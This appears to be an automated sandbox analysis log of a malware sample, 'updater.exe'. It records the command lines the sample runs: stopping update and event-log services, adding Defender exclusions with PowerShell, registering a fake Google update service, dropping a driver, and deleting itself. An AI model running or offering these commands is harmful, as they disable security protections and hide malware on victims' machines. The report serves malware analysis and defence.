          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\choice.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: updater.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: updater.exeStatic file information: File size 2728960 > 1048576
          Source: updater.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x27d800
          Source: updater.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr
          Source: updater.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: updater.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: updater.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: updater.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: updater.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: updater.exeStatic PE information: section name: .00cfg
          Source: updater.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E1394 push qword ptr [00007FF6568ED004h]; ret 0_2_00007FF6568E1403
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE1394 push qword ptr [00007FF758EED004h]; ret 36_2_00007FF758EE1403
          Source: C:\Windows\System32\conhost.exeCode function: 60_2_0000000140001394 push qword ptr [0000000140009004h]; ret 60_2_0000000140001403

          Persistence and Installation Behavior

          barindex
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\zlvyxohjpfnw.sysJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\zlvyxohjpfnw.sysJump to dropped file
          Source: C:\Users\user\Desktop\updater.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\zlvyxohjpfnw.sysJump to dropped file
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Self deletion via cmd or bat file
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
